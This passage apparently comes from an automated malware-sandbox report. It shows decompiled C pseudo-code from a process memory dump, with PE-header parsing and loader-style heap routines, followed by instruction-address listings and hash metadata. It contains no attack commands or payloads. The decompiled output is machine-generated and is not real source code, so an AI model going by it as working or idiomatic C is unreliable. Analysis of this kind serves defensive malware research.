																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E0118E9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L01188F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E011B3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                                                          0x0118d5f2
                                                                          0x0118d5f5
                                                                          0x0118d5f5
                                                                          0x0118d5fd
                                                                          0x0118d600
                                                                          0x0118d60a
                                                                          0x0118d60d
                                                                          0x0118d617
                                                                          0x0118d61d
                                                                          0x0118d627
                                                                          0x0118d62e
                                                                          0x0118d911
                                                                          0x0118d913
                                                                          0x00000000
                                                                          0x0118d919
                                                                          0x0118d919
                                                                          0x0118d919
                                                                          0x0118d634
                                                                          0x0118d634
                                                                          0x0118d634
                                                                          0x0118d634
                                                                          0x0118d640
                                                                          0x0118d8bf
                                                                          0x00000000
                                                                          0x0118d646
                                                                          0x0118d646
                                                                          0x0118d64d
                                                                          0x0118d652
                                                                          0x011db2fc
                                                                          0x011db2fc
                                                                          0x011db302
                                                                          0x011db33b
                                                                          0x011db341
                                                                          0x00000000
                                                                          0x011db304
                                                                          0x011db304
                                                                          0x011db319
                                                                          0x011db31e
                                                                          0x011db324
                                                                          0x011db326
                                                                          0x011db332
                                                                          0x011db347
                                                                          0x011db34c
                                                                          0x011db351
                                                                          0x011db35a
                                                                          0x00000000
                                                                          0x011db328
                                                                          0x011db328
                                                                          0x00000000
                                                                          0x011db328
                                                                          0x011db326
                                                                          0x0118d658
                                                                          0x0118d658
                                                                          0x0118d65b
                                                                          0x0118d665
                                                                          0x00000000
                                                                          0x0118d66b
                                                                          0x0118d66b
                                                                          0x0118d66b
                                                                          0x0118d66b
                                                                          0x0118d66d
                                                                          0x0118d672
                                                                          0x0118d67a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0118d680
                                                                          0x0118d686
                                                                          0x0118d8ce
                                                                          0x0118d8d4
                                                                          0x0118d8dd
                                                                          0x0118d8e0
                                                                          0x0118d68c
                                                                          0x0118d691
                                                                          0x0118d69d
                                                                          0x0118d6a2
                                                                          0x0118d6a7
                                                                          0x0118d6b0
                                                                          0x0118d6b5
                                                                          0x0118d6e0
                                                                          0x0118d6b7
                                                                          0x0118d6b7
                                                                          0x0118d6b9
                                                                          0x0118d6b9
                                                                          0x0118d6bb
                                                                          0x0118d6bd
                                                                          0x0118d6ce
                                                                          0x0118d6d0
                                                                          0x0118d6d2
                                                                          0x011db363
                                                                          0x011db365
                                                                          0x00000000
                                                                          0x011db36b
                                                                          0x00000000
                                                                          0x011db36b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0118d6bf
                                                                          0x0118d6bf
                                                                          0x0118d6e5
                                                                          0x0118d6e7
                                                                          0x0118d6e9
                                                                          0x0118d6ec
                                                                          0x0118d6ec
                                                                          0x0118d6ef
                                                                          0x0118d6f5
                                                                          0x0118d6f9
                                                                          0x0118d6fb
                                                                          0x0118d6fd
                                                                          0x0118d701
                                                                          0x0118d703
                                                                          0x0118d70a
                                                                          0x0118d70a
                                                                          0x0118d701
                                                                          0x0118d710
                                                                          0x0118d710
                                                                          0x0118d6c1
                                                                          0x0118d6c1
                                                                          0x0118d6c6
                                                                          0x011db36d
                                                                          0x011db36f
                                                                          0x00000000
                                                                          0x011db375
                                                                          0x011db375
                                                                          0x011db375
                                                                          0x00000000
                                                                          0x011db375
                                                                          0x00000000
                                                                          0x0118d6cc
                                                                          0x0118d6d8
                                                                          0x0118d6d8
                                                                          0x0118d6d8
                                                                          0x00000000
                                                                          0x0118d6c6
                                                                          0x0118d6bf
                                                                          0x00000000
                                                                          0x0118d6da
                                                                          0x0118d6da
                                                                          0x0118d716
                                                                          0x0118d71b
                                                                          0x0118d720
                                                                          0x0118d726
                                                                          0x0118d726
                                                                          0x0118d72d
                                                                          0x00000000
                                                                          0x0118d733
                                                                          0x0118d739
                                                                          0x0118d742
                                                                          0x0118d750
                                                                          0x0118d758
                                                                          0x0118d764
                                                                          0x0118d776
                                                                          0x0118d77a
                                                                          0x0118d783
                                                                          0x0118d928
                                                                          0x0118d92c
                                                                          0x0118d93d
                                                                          0x0118d944
                                                                          0x0118d94f
                                                                          0x0118d954
                                                                          0x0118d956
                                                                          0x0118d95f
                                                                          0x0118d961
                                                                          0x0118d973
                                                                          0x0118d973
                                                                          0x0118d956
                                                                          0x0118d944
                                                                          0x0118d92c
                                                                          0x0118d78b
                                                                          0x011db394
                                                                          0x0118d791
                                                                          0x0118d798
                                                                          0x011db3a3
                                                                          0x011db3bb
                                                                          0x011db3bb
                                                                          0x0118d7a5
                                                                          0x0118d866
                                                                          0x0118d870
                                                                          0x0118d892
                                                                          0x0118d898
                                                                          0x0118d89e
                                                                          0x0118d8a0
                                                                          0x0118d8a6
                                                                          0x0118d8ac
                                                                          0x0118d8ae
                                                                          0x0118d8b4
                                                                          0x0118d8b4
                                                                          0x0118d8ae
                                                                          0x0118d7a5
                                                                          0x0118d78b
                                                                          0x0118d7b1
                                                                          0x011db3c5
                                                                          0x011db3c5
                                                                          0x0118d7c3
                                                                          0x0118d7ca
                                                                          0x0118d7e5
                                                                          0x0118d7eb
                                                                          0x0118d8eb
                                                                          0x0118d8ed
                                                                          0x00000000
                                                                          0x0118d8f3
                                                                          0x0118d8f3
                                                                          0x0118d8f3
                                                                          0x00000000
                                                                          0x0118d8ed
                                                                          0x0118d7cc
                                                                          0x0118d7cc
                                                                          0x0118d7d2
                                                                          0x00000000
                                                                          0x0118d7d4
                                                                          0x0118d7d4
                                                                          0x0118d7d7
                                                                          0x0118d7df
                                                                          0x011db3d4
                                                                          0x011db3d9
                                                                          0x011db3dc
                                                                          0x011db3dc
                                                                          0x011db3df
                                                                          0x011db3e2
                                                                          0x011db468
                                                                          0x011db46d
                                                                          0x011db46f
                                                                          0x011db46f
                                                                          0x011db475
                                                                          0x0118d8f8
                                                                          0x0118d8f9
                                                                          0x0118d8fd
                                                                          0x011db3e8
                                                                          0x011db3e8
                                                                          0x011db3eb
                                                                          0x011db3ed
                                                                          0x00000000
                                                                          0x011db3ef
                                                                          0x011db3ef
                                                                          0x011db3f1
                                                                          0x011db3f4
                                                                          0x011db3fe
                                                                          0x011db404
                                                                          0x011db409
                                                                          0x011db40e
                                                                          0x011db410
                                                                          0x011db410
                                                                          0x011db414
                                                                          0x011db414
                                                                          0x011db41b
                                                                          0x011db420
                                                                          0x011db423
                                                                          0x011db425
                                                                          0x011db427
                                                                          0x011db42a
                                                                          0x011db42d
                                                                          0x011db42d
                                                                          0x011db42a
                                                                          0x011db432
                                                                          0x011db436
                                                                          0x011db438
                                                                          0x011db43b
                                                                          0x011db43b
                                                                          0x011db449
                                                                          0x011db44e
                                                                          0x011db454
                                                                          0x011db458
                                                                          0x011db458
                                                                          0x011db45d
                                                                          0x00000000
                                                                          0x011db45d
                                                                          0x011db3ed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0118d7df
                                                                          0x0118d7d2
                                                                          0x0118d7ca
                                                                          0x011db37c
                                                                          0x011db37e
                                                                          0x011db385
                                                                          0x011db38a
                                                                          0x00000000
                                                                          0x011db38a
                                                                          0x0118d742
                                                                          0x0118d7f1
                                                                          0x0118d7f8
                                                                          0x011db49b
                                                                          0x011db49b
                                                                          0x0118d800
                                                                          0x0118d837
                                                                          0x0118d843
                                                                          0x0118d845
                                                                          0x0118d847
                                                                          0x0118d84a
                                                                          0x0118d84b
                                                                          0x0118d84e
                                                                          0x0118d857
                                                                          0x0118d818
                                                                          0x0118d824
                                                                          0x0118d831
                                                                          0x011db4a5
                                                                          0x011db4ab
                                                                          0x011db4b3
                                                                          0x011db4b8
                                                                          0x011db4bb
                                                                          0x00000000
                                                                          0x011db4c1
                                                                          0x011db4c1
                                                                          0x011db4c8
                                                                          0x00000000
                                                                          0x011db4ce
                                                                          0x011db4d4
                                                                          0x011db4e1
                                                                          0x011db4e3
                                                                          0x011db4e5
                                                                          0x00000000
                                                                          0x011db4eb
                                                                          0x011db4f0
                                                                          0x011db4f2
                                                                          0x0118dac9
                                                                          0x0118dacc
                                                                          0x0118dacf
                                                                          0x0118dad1
                                                                          0x0118dd78
                                                                          0x0118dd78
                                                                          0x0118dcf2
                                                                          0x00000000
                                                                          0x0118dad7
                                                                          0x0118dad9
                                                                          0x0118dadb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0118dae1
                                                                          0x0118dae1
                                                                          0x0118dae4
                                                                          0x0118dae6
                                                                          0x011db4f9
                                                                          0x011db4f9
                                                                          0x011db500
                                                                          0x0118daec
                                                                          0x0118daec
                                                                          0x0118daf5
                                                                          0x0118daf8
                                                                          0x0118dafb
                                                                          0x0118db03
                                                                          0x0118db11
                                                                          0x0118db16
                                                                          0x0118db19
                                                                          0x0118db1b
                                                                          0x011db52c
                                                                          0x011db531
                                                                          0x011db534
                                                                          0x0118db21
                                                                          0x0118db21
                                                                          0x0118db24
                                                                          0x0118dcd9
                                                                          0x0118dce2
                                                                          0x0118dce5
                                                                          0x0118dd6a
                                                                          0x0118dd6d
                                                                          0x00000000
                                                                          0x0118dd73
                                                                          0x011db51a
                                                                          0x011db51c
                                                                          0x011db51f
                                                                          0x011db524
                                                                          0x00000000
                                                                          0x011db524
                                                                          0x0118dce7
                                                                          0x0118dce7
                                                                          0x0118dce7
                                                                          0x00000000
                                                                          0x0118dce7
                                                                          0x00000000
                                                                          0x0118db2a
                                                                          0x0118db2c
                                                                          0x0118db31
                                                                          0x0118db33
                                                                          0x0118db36
                                                                          0x0118db39
                                                                          0x0118db3b
                                                                          0x0118db66
                                                                          0x0118db66
                                                                          0x0118db3d
                                                                          0x0118db3d
                                                                          0x0118db3e
                                                                          0x0118db46
                                                                          0x0118db47
                                                                          0x0118db49
                                                                          0x0118db4c
                                                                          0x0118db53
                                                                          0x0118db55
                                                                          0x0118db58
                                                                          0x0118db5a
                                                                          0x011db50a
                                                                          0x011db50f
                                                                          0x011db512
                                                                          0x0118db60
                                                                          0x0118db60
                                                                          0x0118db63
                                                                          0x0118db63
                                                                          0x00000000
                                                                          0x0118db63
                                                                          0x0118db5a
                                                                          0x0118db3b
                                                                          0x0118db24
                                                                          0x0118db69
                                                                          0x0118db69
                                                                          0x0118db6c
                                                                          0x0118db6f
                                                                          0x0118db74
                                                                          0x011db557
                                                                          0x011db557
                                                                          0x011db55e
                                                                          0x0118db7a
                                                                          0x0118db7c
                                                                          0x0118db7f
                                                                          0x0118db82
                                                                          0x0118db85
                                                                          0x00000000
                                                                          0x0118db8b
                                                                          0x0118db8b
                                                                          0x0118db8d
                                                                          0x0118db9b
                                                                          0x0118db9b
                                                                          0x0118db9d
                                                                          0x0118dba0
                                                                          0x0118dba2
                                                                          0x0118dba4
                                                                          0x0118dba7
                                                                          0x0118dba9
                                                                          0x0118dbae
                                                                          0x0118dbae
                                                                          0x0118dbb1
                                                                          0x0118dbb4
                                                                          0x0118dbb4
                                                                          0x0118dbb7
                                                                          0x0118dbba
                                                                          0x0118dcd2
                                                                          0x0118dcd4
                                                                          0x00000000
                                                                          0x0118dbc0
                                                                          0x0118dbc0
                                                                          0x0118dbd2
                                                                          0x0118dbd7
                                                                          0x0118dbda
                                                                          0x0118dbdd
                                                                          0x0118dbdf
                                                                          0x00000000
                                                                          0x0118dbe5
                                                                          0x0118dbe5
                                                                          0x0118dbee
                                                                          0x0118dbf1
                                                                          0x011db541
                                                                          0x011db544
                                                                          0x00000000
                                                                          0x011db546
                                                                          0x011db546
                                                                          0x00000000
                                                                          0x011db546
                                                                          0x0118dbf7
                                                                          0x0118dbf7
                                                                          0x0118dbfd
                                                                          0x0118dbfd
                                                                          0x0118dbff
                                                                          0x0118dc0b
                                                                          0x0118dc15
                                                                          0x0118dc1b
                                                                          0x0118dc1d
                                                                          0x0118dc21
                                                                          0x0118dc21
                                                                          0x0118dc23
                                                                          0x0118dc23
                                                                          0x0118dc26
                                                                          0x0118dc29
                                                                          0x0118dc2b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0118dc31
                                                                          0x0118dc34
                                                                          0x0118dc36
                                                                          0x0118dcbf
                                                                          0x0118dcbf
                                                                          0x0118dcc2
                                                                          0x00000000
                                                                          0x0118dc3c
                                                                          0x0118dc41
                                                                          0x0118dc43
                                                                          0x00000000
                                                                          0x0118dc45
                                                                          0x0118dc45
                                                                          0x0118dc47
                                                                          0x00000000
                                                                          0x0118dc4d
                                                                          0x0118dc4d
                                                                          0x0118dc50
                                                                          0x0118dc52
                                                                          0x0118dc55
                                                                          0x0118dcfa
                                                                          0x0118dcfe
                                                                          0x0118dd08
                                                                          0x0118dd0a
                                                                          0x0118dd0c
                                                                          0x00000000
                                                                          0x0118dd12
                                                                          0x0118dd15
                                                                          0x0118dd2d
                                                                          0x0118dd2f
                                                                          0x0118dd32
                                                                          0x0118dd35
                                                                          0x00000000
                                                                          0x0118dd35
                                                                          0x0118dc5b
                                                                          0x0118dc5b
                                                                          0x0118dc5e
                                                                          0x0118dc61
                                                                          0x0118dc64
                                                                          0x0118dc67
                                                                          0x0118dc67
                                                                          0x0118dc6a
                                                                          0x0118dc6c
                                                                          0x0118dc8e
                                                                          0x0118dc8e
                                                                          0x0118dc91
                                                                          0x0118dc93
                                                                          0x0118dcce
                                                                          0x0118dcce
                                                                          0x0118dc95
                                                                          0x0118dc9c
                                                                          0x0118dc6e
                                                                          0x0118dc72
                                                                          0x0118dc75
                                                                          0x0118dc77
                                                                          0x0118dc79
                                                                          0x011db551
                                                                          0x011db551
                                                                          0x00000000
                                                                          0x0118dc7f
                                                                          0x0118dc7f
                                                                          0x0118dc81
                                                                          0x00000000
                                                                          0x0118dc83
                                                                          0x0118dc86
                                                                          0x0118dc88
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0118dc88
                                                                          0x0118dc81
                                                                          0x0118dc79
                                                                          0x0118dc6c
                                                                          0x0118dc55
                                                                          0x0118dc47
                                                                          0x0118dc43
                                                                          0x00000000
                                                                          0x0118dc36
                                                                          0x0118dc23
                                                                          0x00000000
                                                                          0x0118dbff
                                                                          0x0118dbf1
                                                                          0x0118dbdf
                                                                          0x0118db8f
                                                                          0x0118db92
                                                                          0x0118db95
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0118db95
                                                                          0x0118db8d
                                                                          0x0118db85
                                                                          0x0118db74
                                                                          0x0118dc9f
                                                                          0x0118dca2
                                                                          0x0118dcb0
                                                                          0x0118dcb0
                                                                          0x0118dad1
                                                                          0x011db4e5
                                                                          0x011db4c8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0118d831
                                                                          0x00000000
                                                                          0x0118d800
                                                                          0x011db47f
                                                                          0x011db485
                                                                          0x00000000
                                                                          0x011db485
                                                                          0x0118d665
                                                                          0x0118d652
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 232160e38b75ea0e1e22771e8fcfec28f965a37d73adff793c6a2a8c9a9ab09b
                                                                          • Instruction ID: 352676e6607b116706f6c05e93f378cb8ca544f8608c43462afebd3ca16c6890
                                                                          • Opcode Fuzzy Hash: 232160e38b75ea0e1e22771e8fcfec28f965a37d73adff793c6a2a8c9a9ab09b
                                                                          • Instruction Fuzzy Hash: C4E1E230A0475ACFEF2DEF58D884BA9B7B1BF46308F158199D90A972D1DB309981CF52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0118849B, Relevance: .3, Instructions: 290COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 92%
                                                                          			E0118849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x124f9c0);
				E011CD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1267b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0118CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E01192280( *[fs:0x30], 0x1268550);
						_t139 =  *0x1267b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E011AF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0118FFB0(_t193, _t235, 0x1268550);
								L5:
								return E011CD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E01171C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1267b9c; // 0x0
							_t235 = L01194620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1267b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E011AA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0118FFB0(_t193, _t235, 0x1268550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L011977F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L011977F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1267b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1267b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E011B37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1267b9c; // 0x0
									_t214 = L01194620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E011B37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1267b10 =  *0x1267b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1267b04 =  *0x1267b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L011977F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L011977F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1267b08 =  *0x1267b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E011B57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E011BF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L011977F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E011AA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L011977F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E011B96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                                          0x0118849b
                                                                          0x0118849b
                                                                          0x0118849b
                                                                          0x0118849b
                                                                          0x0118849d
                                                                          0x011884a2
                                                                          0x011884a7
                                                                          0x011884b1
                                                                          0x011884d8
                                                                          0x00000000
                                                                          0x011884b3
                                                                          0x011884c4
                                                                          0x011884c9
                                                                          0x011884cd
                                                                          0x011884cf
                                                                          0x011884cf
                                                                          0x011884d6
                                                                          0x011884e6
                                                                          0x011884e9
                                                                          0x011884ec
                                                                          0x011884ef
                                                                          0x011884f2
                                                                          0x011884f4
                                                                          0x011884fc
                                                                          0x01188501
                                                                          0x01188506
                                                                          0x01188509
                                                                          0x011886e0
                                                                          0x011886e5
                                                                          0x011886e8
                                                                          0x011886ed
                                                                          0x011886f0
                                                                          0x011886f2
                                                                          0x011d9afd
                                                                          0x011d9b02
                                                                          0x011884da
                                                                          0x011884df
                                                                          0x011884df
                                                                          0x011886fa
                                                                          0x011886fd
                                                                          0x011886fe
